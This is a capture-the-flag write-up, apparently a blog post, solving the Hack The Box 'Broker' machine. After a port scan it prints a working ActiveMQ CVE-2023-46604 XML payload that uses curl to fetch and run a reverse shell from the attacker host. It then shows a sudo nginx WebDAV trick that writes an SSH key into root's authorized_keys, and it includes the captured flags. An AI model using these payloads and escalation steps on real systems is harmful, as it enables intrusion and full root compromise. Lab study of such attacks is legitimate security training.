[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升

Мартин.2025-02-12 6:05

Information Gathering

IP Address Opening Ports
10.10.11.243 TCP:22,80,1883,5672,8161,38507,61613,61614,61616

$ ip='10.10.11.243'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码 
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp    open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp  open  mqtt
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|_    ActiveMQ/Advisory/Consumer/Topic/#: 
5672/tcp  open  amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
8161/tcp  open  http       Jetty 9.4.39.v20210325
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
38507/tcp open  tcpwrapped
61613/tcp open  stomp      Apache ActiveMQ
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open  apachemq   ActiveMQ OpenWire transport
| fingerprint-strings: 
|   NULL: 
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName 
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails 
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion 
|_    5.15.15

Apache MQ RCE

$ wget https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/archive/refs/heads/main.zip

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>sh</value>
            <value>-c</value>
            <!-- The command below downloads the file and saves it as test.elf -->
	    <value>curl -s -o reverse http://10.10.16.28/reverse; chmod +x ./reverse; ./reverse</value>
        </list>
        </constructor-arg>
    </bean>
</beans>

$ go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.28:9999/poc-linux.xml

User.txt

a178c399b0c91839399aa5b98c0c117c

Privilege Escalation: Nginx ngx_http_dav_module

sh 复制代码 
$ cat << EOF> /tmp/shell.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;

events {
    worker_connections 768;
}

http {
    server {
        listen 10031;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
EOF

$ sudo nginx -c /tmp/shell.conf

$ ssh-keygen

$ curl -X PUT http://10.10.11.243:10031/root/.ssh/authorized_keys -d @/home/maptnh/.ssh/id_ed25519.pub

$ ssh root@10.10.11.243 -i /home/maptnh/.ssh/id_ed25519

Root.txt

26eecd6da62a87d2098e474929f93140

相关推荐
阿里云云原生13 分钟前
使用 Apifox、Postman 测试 Dubbo 服务,Apache Dubbo OpenAPI 即将发布
apache·dubbo·postman
祈澈菇凉2 小时前
详细解释一下HTTPS握手过程中的密钥交换?
网络协议·http·https
YGGP4 小时前
【GeeRPC】Day5:支持 HTTP 协议
http·rpc·golang
FIN技术铺4 小时前
HTTP请求&响应分析:HTTP/1.1→HTTP/2
网络·网络协议·http
垚垚 Securify 前沿站6 小时前
深入剖析 Apache Shiro550 反序列化漏洞及复现
运维·网络·安全·web安全·系统安全·apache
予早16 小时前
HTTP 请求头、响应头常见字段分析
网络·网络协议·http
快去睡觉~16 小时前
Linux之Http协议分析以及cookie和session
linux·运维·http
一路向北North17 小时前
apache-poi导出excel数据
apache·excel
lj90772264419 小时前
nexus部署及配置https访问
数据仓库·网络协议·http·docker·https
热门推荐
01如何在WPS和Word/Excel中直接使用DeepSeek功能02DeepSeek本地部署详细指南03DeepSeek各版本说明与优缺点分析04本地部署DeepSeek教程(Mac版本)05DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具06DeepSeek r1本地安装全指南07保姆级教程:利用Ollama与Open-WebUI本地部署 DeedSeek-R1大模型08在Windows下安装Ollama并体验DeepSeek r1大模型09将DeepSeek接入Word,打造AI办公助手10DeepSeek RAGFlow构建本地知识库系统